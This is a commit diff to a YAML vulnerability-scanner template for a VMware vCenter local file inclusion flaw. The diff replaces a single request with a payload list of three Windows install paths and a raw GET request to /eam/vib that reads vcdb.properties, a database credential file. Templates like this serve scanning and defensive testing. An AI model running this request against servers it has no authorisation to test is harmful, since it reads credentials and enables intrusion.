🔨 Using paths as payloads

2020-10-13 21:55:29 +07:00 · 2020-10-13 21:55:29 +07:00 · ac8c5c98b4
parent e0afe64ec1
commit ac8c5c98b4
1 changed files with 14 additions and 5 deletions
--- a/vulnerabilities/vmware-vcenter-lfi.yaml
+++ b/vulnerabilities/vmware-vcenter-lfi.yaml
@ -7,11 +7,20 @@ info:
  description: https://twitter.com/ptswarm/status/1316016337550938122

 requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/eam/vib?id=C:\\ProgramData\\VMware\\vCenterServer\\cfg\\vmware-vpx\\vcdb.properties"
-    headers:
-      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
+  - payloads:
+      path:
+        - "C:\\ProgramData\\VMware\\VMware+VirtualCenter"  # vCenter Server 5.5 and earlier (Windows 2008)
+        - "C:\\Documents+and+Settings\\All+Users\\Application+Data\\VMware\\VMware+VirtualCenter"  # Other Windows versions
+        - "C:\\ProgramData\\VMware\\vCenterServer\\cfg\\vmware-vpx"  # vCenter Server => 6.0
+    attack: sniper
+    raw:
+      - |
+        GET /eam/vib?id=path\vcdb.properties HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
+        Accept: */*
+        Accept-Language: en
+        Connection: close
    matchers-condition: and
    matchers:
      - type: regex